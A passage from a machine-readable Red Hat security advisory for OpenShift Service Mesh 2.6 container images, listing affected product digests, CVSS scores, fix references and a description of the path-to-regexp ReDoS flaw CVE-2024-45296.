"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "serve-static: Improper Sanitization in serve-static", }, { cve: "CVE-2024-45296", cwe: { id: "CWE-1333", name: "Inefficient Regular Expression Complexity", }, discovery_date: "2024-09-09T19:20:18.127723+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2310908", }, ], notes: [ { category: "description", text: "A flaw was found in path-to-regexp package, where it turns path strings into regular expressions. In certain cases, path-to-regexp will output a regular expression that can be exploited to cause poor performance. Because JavaScript is single-threaded and regex matching runs on the main thread, poor performance will block the event loop and lead to a denial of service (DoS).", title: "Vulnerability description", }, { category: "summary", text: "path-to-regexp: Backtracking regular expressions cause ReDoS", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-45296", }, { category: "external", summary: "RHBZ#2310908", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310908", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-45296", url: "https://www.cve.org/CVERecord?id=CVE-2024-45296", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-45296", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-45296", }, { category: "external", summary: "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f", url: "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f", }, { category: "external", summary: "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6", url: "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6", }, { category: "external", summary: "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j", url: "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j", }, ], release_date: "2024-09-09T19:15:13.330000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:48+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7726", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", 